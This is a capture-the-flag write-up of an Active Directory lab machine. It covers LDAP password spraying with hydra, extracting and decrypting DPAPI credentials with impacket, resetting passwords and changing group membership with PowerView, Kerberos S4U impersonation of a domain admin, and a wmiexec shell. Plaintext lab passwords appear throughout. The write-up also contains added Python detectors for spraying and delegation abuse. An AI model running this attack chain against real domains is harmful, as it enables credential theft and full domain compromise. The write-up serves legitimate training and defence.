P.Rosa:Rosaisbest123


C.Neri user


The only thing we could access with P.Rosa was ldapsearch, which turned up nothing useful. Everything else was a dead end, so I resorted to password spraying.

Got password via password spraying.

I got the password policy from ldapsearch, which showed that the minimum password length was 7 characters, so I created a custom rockyou.txt containing only passwords of at least 7 characters. Turns out this was the unintended way.

hydra -L test.txt ldap3://10.10.11.45 -P rockyou_passwords.txt -t 50 -I

login: [email protected]   password: Zer0the0ne
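A spray like the one above is loud on the DC side: one source failing once against many accounts in a short window. The following is an added detection example, not part of the original writeup, that runs that logic over a constructed, simplified bind-attempt log (the line format, IPs and the extra account names such as g.viola and m.rossi are assumptions); the same rule applies to DC events such as 4771/4776/4625 once the fields are extracted.

```python
"""Detect a password spray in authentication-failure logs.

Added example, not part of the original writeup. The log format is a
constructed, simplified one (one line per bind attempt: timestamp, source,
account, result); the same logic applies to DC events such as 4771/4776/4625
once those fields are extracted. Account and IP values are constructed.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) user=(?P<user>\S+) result=(?P<result>\S+)$"
)

# Constructed sample: 10.10.14.5 tries five accounts once each with one hit
# (spray shape), while 10.0.0.23 is one user mistyping their own password.
SAMPLE_LOG = """\
2024-05-01T09:00:01 src=10.10.14.5 user=p.rosa result=FAIL
2024-05-01T09:00:02 src=10.10.14.5 user=c.neri result=FAIL
2024-05-01T09:00:02 src=10.10.14.5 user=l.bianchi result=FAIL
2024-05-01T09:00:03 src=10.10.14.5 user=svc_sql result=FAIL
2024-05-01T09:00:03 src=10.10.14.5 user=g.viola result=FAIL
2024-05-01T09:00:04 src=10.10.14.5 user=c.neri result=SUCCESS
2024-05-01T09:05:10 src=10.0.0.23 user=m.rossi result=FAIL
2024-05-01T09:05:40 src=10.0.0.23 user=m.rossi result=FAIL
2024-05-01T09:06:02 src=10.0.0.23 user=m.rossi result=SUCCESS
"""


def parse(log_text):
    """Yield (timestamp, src, user, result) tuples, skipping malformed lines."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield datetime.fromisoformat(m["ts"]), m["src"], m["user"], m["result"]


def detect_spray(log_text, window=timedelta(minutes=10), min_users=4, max_per_user=2):
    """Return {src: [users]} for every source whose failures inside `window`
    touch at least `min_users` distinct accounts with no more than
    `max_per_user` failures each. That shape (wide, shallow) is a spray;
    many failures on one account is brute force and is left to other rules."""
    fails = defaultdict(list)
    for ts, src, user, result in sorted(parse(log_text)):
        if result == "FAIL":
            fails[src].append((ts, user))

    hits = defaultdict(set)
    for src, attempts in fails.items():
        start = 0
        for end in range(len(attempts)):
            # advance the window start until every attempt fits inside `window`
            while attempts[end][0] - attempts[start][0] > window:
                start += 1
            per_user = defaultdict(int)
            for _, user in attempts[start:end + 1]:
                per_user[user] += 1
            if len(per_user) >= min_users and max(per_user.values()) <= max_per_user:
                hits[src].update(per_user)
    return {src: sorted(users) for src, users in hits.items()}


def compromised_after_spray(log_text, hits):
    """Accounts that logged in successfully from a flagged source: the first
    ones to reset and review."""
    return sorted({user for _, src, user, result in parse(log_text)
                   if src in hits and result == "SUCCESS"})


if __name__ == "__main__":
    flagged = detect_spray(SAMPLE_LOG)
    print("spray sources:", flagged)
    print("accounts to reset:", compromised_after_spray(SAMPLE_LOG, flagged))
```

The thresholds are deliberately low for the sample; on a real DC you would tune `min_users` against the normal number of distinct accounts a single source touches, and feed the flagged accounts straight into a reset and a review of the successful logon.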


The machine doesn't allow NTLM auth, so we have to use Kerberos.

Get a TGT using the username and password above.

impacket-getTGT vintage.htb/[email protected]

export [email protected]

We need to set up our krb5.conf for evil-winrm.

└─$ cat /etc/krb5.conf      

[libdefaults]
   default_realm = VINTAGE.HTB

[realms]
   VINTAGE.HTB = {
       kdc = dc01.vintage.htb
   }

[domain_realm]
   .vintage.htb = VINTAGE.HTB
   vintage.htb = VINTAGE.HTB

evil-winrm -i dc01.vintage.htb -r vintage.htb


We can use DPAPI to recover the credentials for C.Neri_ADM.

We need to copy the files off the target. To copy them, we first base64-encode them.

Files are located at

C:\Users\C.Neri\AppData\Roaming\Microsoft\Credentials\ 

and 

C:\Users\C.Neri\AppData\Roaming\Microsoft\Protect\S-1-5-21-4024337825-2033394866-2055507597-1115\


certutil -encode <file name>

Then we can cat the file, which gives us the base64; copy that to our machine and decode it to get the original file contents.

Now I went through and set up a Windows VM with mimikatz and tried decrypting them, but it failed. I later found out mimikatz has a dpapi module and it decrypted them with two commands.

Get the master key

impacket-dpapi  masterkey -file "99cf41a3-a552-4cf7-a8d7-aca2d6f7339b" -sid S-1-5-21-4024337825-2033394866-2055507597-1115 -password Zer0the0ne


Decrypt the credential file with the master key

file location - C:\Users\C.Neri\AppData\Roaming\Microsoft\Protect\S-1-5-21-4024337825-2033394866-2055507597-1115\

impacket-dpapi credential -file "C4BB96844A5C9DD45D5B6A9859252BA6" -key 0xf8901b2125dd10209da9f66562df2e68e89a48cd0278b48a37f510df01418e68b283c61707f3935662443d81c0d352f1bc8055523bf65b2d763191ecd44e525a


vintage\c.neri_adm
Uncr4ck4bl3P4ssW0rd0312


Administrator

This next part of the machine took me 15+ hours. This was by far the hardest machine I've ever done.

Overview of the attack

C.Neri_Adm has write access over DelegatedAdmins

DelegatedAdmins can impersonate almost any user

We need to be able to add an SPN to a user. C.Neri has GenericAll over svc_sql.

These are the commands we need to execute to get this done; I combined them all into one line to make it easier. They use C.Neri's credentials to change the password of svc_sql.

$SecPassword = ConvertTo-SecureString 'Zer0the0ne' -AsPlainText -Force; $Cred = New-Object System.Management.Automation.PSCredential('vintage\c.neri', $SecPassword); Import-Module ../PowerView.ps1; $UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force; Set-DomainUserPassword -Identity svc_sql -AccountPassword $UserPassword -Credential $Cred

These commands will use c.neri_adm's credentials to add svc_sql to the DelegatedAdmins group.

$SecPassword = ConvertTo-SecureString 'Uncr4ck4bl3P4ssW0rd0312' -AsPlainText -Force; $Cred = New-Object System.Management.Automation.PSCredential('vintage\c.neri_adm', $SecPassword); Add-DomainGroupMember -Identity 'DELEGATEDADMINS' -Members 'svc_sql' -Credential $Cred


We will also need to unlock svc_sql's account, as it's locked.

Enable-ADAccount -Identity svc_sql


We also need a TGT for svc_sql, which we can now get since we have its password.

impacket-getTGT vintage.htb/[email protected]
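Each of the staging steps above (password reset, SPN added, group membership changed, account enabled) lands in the DC's Security log as a separate, individually unremarkable event; it is the combination on one account within minutes that is worth alerting on. The following is an added detection example, not part of the original writeup: it correlates constructed event records carrying the real Windows event IDs for those changes (4724, 5136, 4728, 4722). The actor names, timestamps and the idea that DelegatedAdmins is the group to watch are assumptions for the sample.

```python
"""Correlate the directory changes that stage a delegation abuse.

Added example, not part of the original writeup. Events are constructed
dictionaries carrying the Security event IDs a DC logs for these changes
(4724 password reset, 5136 directory object modified, 4728 member added to a
global group, 4722 account enabled); a real pipeline would fill them from the
Security log. The group name mirrors the writeup; actors and times are assumed.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Groups whose membership confers delegation rights (assumed for this sample).
DELEGATION_GROUPS = {"DelegatedAdmins"}
GROUP_ADD_EVENTS = {4728, 4732, 4756}  # global, local, universal group member added

EVENTS = [
    {"ts": "2024-05-01T10:00:05", "id": 4724, "subject": "c.neri", "target": "svc_sql"},
    {"ts": "2024-05-01T10:00:20", "id": 5136, "subject": "c.neri", "target": "svc_sql",
     "attr": "servicePrincipalName"},
    {"ts": "2024-05-01T10:00:41", "id": 4728, "subject": "c.neri_adm", "target": "svc_sql",
     "group": "DelegatedAdmins"},
    {"ts": "2024-05-01T10:00:50", "id": 4722, "subject": "c.neri_adm", "target": "svc_sql"},
    {"ts": "2024-05-01T13:30:00", "id": 4724, "subject": "helpdesk", "target": "m.rossi"},
]

REQUIRED = {"password_reset", "spn_set", "delegation_group_add"}


def signal(event):
    """Map an event to the staging step it represents, or None."""
    if event["id"] == 4724:
        return "password_reset"
    if event["id"] == 5136 and event.get("attr") == "servicePrincipalName":
        return "spn_set"
    if event["id"] in GROUP_ADD_EVENTS and event.get("group") in DELEGATION_GROUPS:
        return "delegation_group_add"
    if event["id"] == 4722:
        return "account_enabled"
    return None


def correlate(events, window=timedelta(minutes=15)):
    """Return {target: {"signals": [...], "actors": [...]}} for accounts that
    received every REQUIRED step within `window`. Any single step is routine
    admin work; the combination on one account in minutes is the thing to page on."""
    by_target = defaultdict(list)
    for e in events:
        s = signal(e)
        if s:
            by_target[e["target"]].append((datetime.fromisoformat(e["ts"]), s, e["subject"]))

    alerts = {}
    for target, rows in by_target.items():
        rows.sort()
        for i in range(len(rows)):
            # every step that falls within `window` of the i-th step
            span = [r for r in rows[i:] if r[0] - rows[i][0] <= window]
            seen = {s for _, s, _ in span}
            if REQUIRED <= seen:
                alerts[target] = {"signals": sorted(seen),
                                  "actors": sorted({a for _, _, a in span})}
                break
    return alerts


if __name__ == "__main__":
    print(correlate(EVENTS))
```

Event 5136 is only written when Directory Service Changes auditing is enabled and the object carries a SACL for attribute writes, so check that before relying on the `spn_set` signal; the other three IDs come from the default account-management audit categories.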


With all of that done we can perform the attack, but we do have to be quick, as there is a cleanup script resetting everything we just did every few minutes.

Request a ticket impersonating L.BIANCHI_ADM, a domain admin. Note: I tried the Administrator user but it would not work, so we have to use this against a domain admin.

[email protected] getST.py -spn ldap/dc01.vintage.htb -impersonate L.BIANCHI_ADM -dc-ip 10.10.11.45 -no-pass -k vintage.htb/svc_sql
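Two things in this step are worth auditing for on the defensive side: which identities can request S4U tickets to the DC at all (enabled, holding an SPN, and in a group the DC trusts), and which privileged accounts are still delegatable. The "almost any user" above and the fact that Administrator could not be impersonated are typically explained by the "Account is sensitive and cannot be delegated" flag or Protected Users membership, which block S4U for that user. The following is an added audit example, not part of the original writeup; it assumes the delegation is resource-based constrained delegation on the DC, and all attribute values, the SPN, and the Protected Users membership are constructed for the sample.

```python
"""Audit which privileged accounts a delegating identity could impersonate.

Added example, not part of the original writeup. The records are constructed
dictionaries shaped like the LDAP attributes an audit would pull with
ldapsearch (sAMAccountName, userAccountControl, servicePrincipalName,
memberOf). Names mirror the writeup; every attribute value, the SPN and the
Protected Users membership are assumptions. It assumes the delegation is
resource-based constrained delegation on the DC.
"""
UF_ACCOUNTDISABLE = 0x2
UF_NOT_DELEGATED = 0x100000   # "Account is sensitive and cannot be delegated"

PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators"}

# Constructed stand-in for the trustees named in the DC's
# msDS-AllowedToActOnBehalfOfOtherIdentity security descriptor.
DC_RBCD_TRUSTEES = {"DelegatedAdmins"}
PROTECTED_USERS = {"Administrator"}   # assumed membership

ACCOUNTS = [
    {"sam": "Administrator", "uac": 0x100200, "spn": [],
     "memberOf": {"Domain Admins", "Administrators"}},
    {"sam": "L.BIANCHI_ADM", "uac": 0x200, "spn": [], "memberOf": {"Domain Admins"}},
    {"sam": "C.Neri_ADM", "uac": 0x200, "spn": [], "memberOf": set()},
    {"sam": "svc_sql", "uac": 0x200, "spn": ["cifs/placeholder.vintage.htb"],
     "memberOf": {"DelegatedAdmins"}},
]


def can_be_delegated(acct, protected_users=PROTECTED_USERS):
    """False when the NOT_DELEGATED flag or Protected Users membership blocks
    S4U tickets for this user; True otherwise."""
    if acct["uac"] & UF_NOT_DELEGATED:
        return False
    return acct["sam"] not in protected_users


def is_privileged(acct):
    return bool(acct["memberOf"] & PRIVILEGED_GROUPS)


def delegating_principals(accounts, trustees=DC_RBCD_TRUSTEES):
    """Enabled accounts that hold an SPN and sit in a trustee group: the
    identities able to request S4U tickets to the resource."""
    return sorted(a["sam"] for a in accounts
                  if a["memberOf"] & trustees and a["spn"]
                  and not a["uac"] & UF_ACCOUNTDISABLE)


def audit(accounts, trustees=DC_RBCD_TRUSTEES, protected_users=PROTECTED_USERS):
    """Split privileged accounts into those still reachable through the
    delegation and those shielded; the fix for the first group is the
    NOT_DELEGATED flag or Protected Users membership."""
    privileged = [a for a in accounts if is_privileged(a)]
    return {
        "delegating": delegating_principals(accounts, trustees),
        "exposed": sorted(a["sam"] for a in privileged if can_be_delegated(a, protected_users)),
        "shielded": sorted(a["sam"] for a in privileged if not can_be_delegated(a, protected_users)),
    }


if __name__ == "__main__":
    for key, names in audit(ACCOUNTS).items():
        print(f"{key}: {', '.join(names) or '-'}")
```

Run against the sample, `svc_sql` is the only delegating principal and `L.BIANCHI_ADM` the only exposed admin, which matches what happened on this box; flipping `svc_sql` to disabled (`0x202`) empties the delegating list, which is why the account had to be enabled first.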


We can now confirm the ticket works with netexec.

KRB5CCNAME=L.BIANCHI_ADM@[email protected] nxc ldap dc01.vintage.htb -u L.BIANCHI_ADM --use-kcache -k


And finally we can use the ticket to get a shell and get the flag.


KRB5CCNAME=L.BIANCHI_ADM@[email protected] impacket-wmiexec vintage.htb/[email protected] -k


I learned a ton of new things, but this machine was extremely hard and pretty unstable.